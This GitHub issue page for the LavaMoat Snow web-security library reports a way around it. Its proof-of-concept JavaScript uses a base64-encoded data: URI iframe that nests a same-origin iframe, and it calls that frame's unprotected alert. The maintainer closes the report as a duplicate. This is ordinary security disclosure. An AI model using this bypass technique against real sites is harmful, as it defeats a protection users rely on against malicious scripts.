search

LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!
https://lavamoat.github.io/snow/demo/
MIT License
100 stars 9 forks source link

Snow can be bypassed with iframe to diffentent origin which has iframe to top origin #117

Closed ivars-vids closed 1 year ago

ivars-vids commented 1 year ago

Reproduce by running

(function(){
    const a = document.createElement('div');
    a.innerHTML = '<iframe src="data:text/html;base64,PGlmcmFtZSBzcmM9Imh0dHBzOi8vbGF2YW1vYXQuZ2l0aHViLmlvL3Nub3cvZGVtby80MDQiPjwvaWZyYW1lPiAg"></iframe>';
    document.head.appendChild(a);
    setTimeout(_=>{frames[0][0].alert('No snow')},500)

}());
weizman commented 1 year ago

@ivars-vids thank you for the report. closing as duplicate though https://github.com/LavaMoat/snow/issues/73#issuecomment-1465143307